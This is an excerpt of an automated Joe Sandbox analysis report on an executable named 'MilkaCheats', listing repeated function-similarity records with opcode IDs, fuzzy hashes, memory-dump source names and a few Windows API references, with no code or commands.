                                                                                              • Opcode Fuzzy Hash: d2f5723994bb9203e3605df3684744d887d2b5ee162dd8ed9dd6320e6c64872b
                                                                                              • Instruction Fuzzy Hash: 7BF0E53A30034557DF14AF3AE8556AA7FD5EFC1720B46405BEB068F351D6759843C7A0
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,000D2E4B,?,20001004,00000000,00000002,?,?,000D244D), ref: 000D59FA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID:
                                                                                              • API String ID: 2299586839-0
                                                                                              • Opcode ID: 4fc59a491c5911bc223c49f5a2ce335177807589d93f73c0b7e22996c8858fe6
                                                                                              • Instruction ID: 90766ac4c6260a317cafaa054bc841bc35b0965ec223a072bd73a38fc9974462
                                                                                              • Opcode Fuzzy Hash: 4fc59a491c5911bc223c49f5a2ce335177807589d93f73c0b7e22996c8858fe6
                                                                                              • Instruction Fuzzy Hash: ECE0DF32900B6CBBCF126F60DC05FEE3E15EF40B23F400012FC052A221CB329C20AAA8
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00007918,000C6CF7), ref: 000C7911
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: 33074d826bcf5a4b4c492fcd91c1fb925470d68c31b3c91d79925c6961cbbbbe
                                                                                              • Instruction ID: faad62eb986aa8aa72f6485823ef64d9b86f4f77ee0f04766f8bc19597dac25a
                                                                                              • Opcode Fuzzy Hash: 33074d826bcf5a4b4c492fcd91c1fb925470d68c31b3c91d79925c6961cbbbbe
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: InA>
                                                                                              • API String ID: 0-2903657838
                                                                                              • Opcode ID: c87f5345c010cd19fc5aaece9cdbd2b6ed7fb7ca2957962ab0ab3d7c57abf243
                                                                                              • Instruction ID: d349657281003d4bf1694d2a74246f100672d42e773a056d1a77ac42519d45dc
                                                                                              • Opcode Fuzzy Hash: c87f5345c010cd19fc5aaece9cdbd2b6ed7fb7ca2957962ab0ab3d7c57abf243
                                                                                              • Instruction Fuzzy Hash: CA6159357483258FD724DE68EC80B3BB7E6ABD4710F248A3CE99687295E730DD218741
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0
                                                                                              • API String ID: 0-4108050209
                                                                                              • Opcode ID: f823962057c98e3a6307e94c1ea056d96ad70172f82927ecd58afa4e52e72160
                                                                                              • Instruction ID: 7ae9d17ff9463e20fe8462e38c52fd472e175b25c9a9809012fc98b043c94d1e
                                                                                              • Opcode Fuzzy Hash: f823962057c98e3a6307e94c1ea056d96ad70172f82927ecd58afa4e52e72160
                                                                                              • Instruction Fuzzy Hash: F0814D37A1D9A147CB194A3C6C513B9BE934B97330F3E83A9D5B29B3D1C72989168350
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8977
                                                                                              • API String ID: 0-400282742
                                                                                              • Opcode ID: 2b2267fc0316455ef54ab5bc0074d5cb6e79a614d92ba33e9f60d99ede0b5f16
                                                                                              • Instruction ID: 5d791c2cc3d7e5d3bf37a5aa0af4e264f4fd91164fbee7c86b49f36b07b29cae
                                                                                              • Opcode Fuzzy Hash: 2b2267fc0316455ef54ab5bc0074d5cb6e79a614d92ba33e9f60d99ede0b5f16
                                                                                              • Instruction Fuzzy Hash: B1518D327443155BD3199A2C9C91B2B77D2FBC9720F29823CE999973E2DB30ED458380
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 89
                                                                                              • API String ID: 0-155395596
                                                                                              • Opcode ID: c8dc68aa6f7f9b844a089c944c90bdf233b42d1042bd0b1e13d77bb8a31c6bca
                                                                                              • Instruction ID: 0b1f7d68ac09c6acb800f4750ed21fca880c25ff985365fe3377d68766ab9e74
                                                                                              • Opcode Fuzzy Hash: c8dc68aa6f7f9b844a089c944c90bdf233b42d1042bd0b1e13d77bb8a31c6bca
                                                                                              • Instruction Fuzzy Hash: 375158716087505BE318AB34DC5637FBBD1EF92714F18892DE9C2EB6C2DE6C88055B82
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: >ebg
                                                                                              • API String ID: 0-4222723227
                                                                                              • Opcode ID: f022885215c873b9fbdd043d8176df0b70d2a1bc549261dbc581a1c67dffcda2
                                                                                              • Instruction ID: b969d8c8e55938c8ec2fdc8982ea020428d115343d596394faa47581d7634f83
                                                                                              • Opcode Fuzzy Hash: f022885215c873b9fbdd043d8176df0b70d2a1bc549261dbc581a1c67dffcda2
                                                                                              • Instruction Fuzzy Hash: BB51482155D3418FDB288B6884802FBBBE2DBA6390F0EC678D9954B3D2D735CD89D391
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @
                                                                                              • API String ID: 0-2766056989
                                                                                              • Opcode ID: ad56595fd8727f308ac17a53f482b209df3fec6dbf017e58120bbd6e3214b75f
                                                                                              • Instruction ID: 840d5e66660fd2ac5bfee3880875f987cab71d98a743304ec7d61ac49e68332e
                                                                                              • Opcode Fuzzy Hash: ad56595fd8727f308ac17a53f482b209df3fec6dbf017e58120bbd6e3214b75f
                                                                                              • Instruction Fuzzy Hash: 633133751083009BD318DF68D8C166BB7F5FB95310F18893CEAA587291D338DA08CB96
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: MZx
                                                                                              • API String ID: 0-2575928145
                                                                                              • Opcode ID: f800674da6378a7d5109c8b39bfa4981d57375322030ef9d72b8fdaa3b2238d1
                                                                                              • Instruction ID: 0d56bb2010bbeb213a0008def9bf4c0714e1d80e1e37753e482b481017e26537
                                                                                              • Opcode Fuzzy Hash: f800674da6378a7d5109c8b39bfa4981d57375322030ef9d72b8fdaa3b2238d1
                                                                                              • Instruction Fuzzy Hash: 08E092B0646244ABF3249B14CC0ABAB76D99BC5700F80887DB589AB3D2DBF86544D792
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 06c4c38f16a4d60ace68a9cc28e894281f07bec4fb7421fc093a61b442ba78d5
                                                                                              • Instruction ID: 424923a47cee2255d040333c341b56d6eae59de46f3a7b02c94fb9a3ee16ba37
                                                                                              • Opcode Fuzzy Hash: 06c4c38f16a4d60ace68a9cc28e894281f07bec4fb7421fc093a61b442ba78d5
                                                                                              • Instruction Fuzzy Hash: 365215716083198BC725DF18D8802BEB3E2FFC5314F29892DDA9A97681E738E951D743
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 13476f7315f4e7477d90eb220a39c2da123e2ad672f8cd8fd3fab8a738484b5e
                                                                                              • Instruction ID: b3501a575b1d4fe453ec536cf97ef31e359d058d495d12f52277fd49f8965b0b
                                                                                              • Opcode Fuzzy Hash: 13476f7315f4e7477d90eb220a39c2da123e2ad672f8cd8fd3fab8a738484b5e
                                                                                              • Instruction Fuzzy Hash: 2F727FB0608F808ED326CB3C8845797BFD5AB5A314F188A6DD0EE873D2C779A505C766
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aab57881356b94424ffbaa648b9f46da7fa48430a986070924ce8b086c1f8b60
                                                                                              • Instruction ID: 0f12ae75ccd5b88e4890f225aee6f51533f9370a5274a608cdbbe41604292632
                                                                                              • Opcode Fuzzy Hash: aab57881356b94424ffbaa648b9f46da7fa48430a986070924ce8b086c1f8b60
                                                                                              • Instruction Fuzzy Hash: C452F870A0878C8FE775CB24C4847B7BBE1EB51314F14482DD6EB46E82C379A985EB52
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e36b86faa8d1ccc44319ff8b12de4c9a00c6cc4713396a6e4696e49310e88840
                                                                                              • Instruction ID: 2fe006b7160e4dbac3031f3f23f6acff263943fa50e56c1bacc43c6356e0b959
                                                                                              • Opcode Fuzzy Hash: e36b86faa8d1ccc44319ff8b12de4c9a00c6cc4713396a6e4696e49310e88840
                                                                                              • Instruction Fuzzy Hash: 65521131508B498FCB14CF18C4806BABBE1FF88315F588A6DEA9A9B741D734D849DF81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4096e9aaaf335f6018dc2b297a811201c3ccc48e2594172a9497424842ccb785
                                                                                              • Instruction ID: a17072e3f55d47a8389e6269afe3b2d39805ab7b1b1b92dacb7d1aa97b43bbb6
                                                                                              • Opcode Fuzzy Hash: 4096e9aaaf335f6018dc2b297a811201c3ccc48e2594172a9497424842ccb785
                                                                                              • Instruction Fuzzy Hash: A7421270515B188FC378CF29C69052ABBF2BB85710BA44A2ED69787F91D736F844EB10
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fe61c65e639b8f8c2db2abd7c86fa61fc38f35e95001bd360d93c332603835fc
                                                                                              • Instruction ID: 35a4d924aa9f50a46c8bc5c7fd0e35ca31d17ea372f0477f0643d9836c26006b
                                                                                              • Opcode Fuzzy Hash: fe61c65e639b8f8c2db2abd7c86fa61fc38f35e95001bd360d93c332603835fc
                                                                                              • Instruction Fuzzy Hash: DED18C727483015BDB188E2888952EB77E2EFD5314F19853CE8A54B3D2E338DD8AD381
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f1a1497c12830bcdfc7aa9e4c59a245e2fd23d4b2bc447d00e69ef04a72a3d63
                                                                                              • Instruction ID: 88f3e138b59d0af59efb1e1222d1be3d4f865504b0781b530cabd20614459d6b
                                                                                              • Opcode Fuzzy Hash: f1a1497c12830bcdfc7aa9e4c59a245e2fd23d4b2bc447d00e69ef04a72a3d63
                                                                                              • Instruction Fuzzy Hash: 85D1D472A083059BC718CF24C88066EBBE5EFC4750F158A3DEA9997791E771DC44DB82
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 928e7a7fa6cce12ed356cb4f5ed7129ca3b0712d6ba2be1fc2d9d553babf83b2
                                                                                              • Instruction ID: cd7cb47e7c98c857eca64a1daa63e8ec16a81372c8c5a509d1d7b83023e5abcb
                                                                                              • Opcode Fuzzy Hash: 928e7a7fa6cce12ed356cb4f5ed7129ca3b0712d6ba2be1fc2d9d553babf83b2
                                                                                              • Instruction Fuzzy Hash: 3DE18C71208385CFD721CF29C880A6BBBE1EF99300F44882DE5D987B52E775E944DB96
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 26627ec0b24bebf55fba7ae6cad0cbc35c78f049632407aee67bb6aef31b63ce
                                                                                              • Instruction ID: b860a9308858febba27dea99fca0fed587a8fd55f710cdbb0b907c00376c4788
                                                                                              • Opcode Fuzzy Hash: 26627ec0b24bebf55fba7ae6cad0cbc35c78f049632407aee67bb6aef31b63ce
                                                                                              • Instruction Fuzzy Hash: 26C1EF756047418FD329CF39C450762FBE2AF96314F2886ADD8DA8B7A2C775D806CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmpDownload File
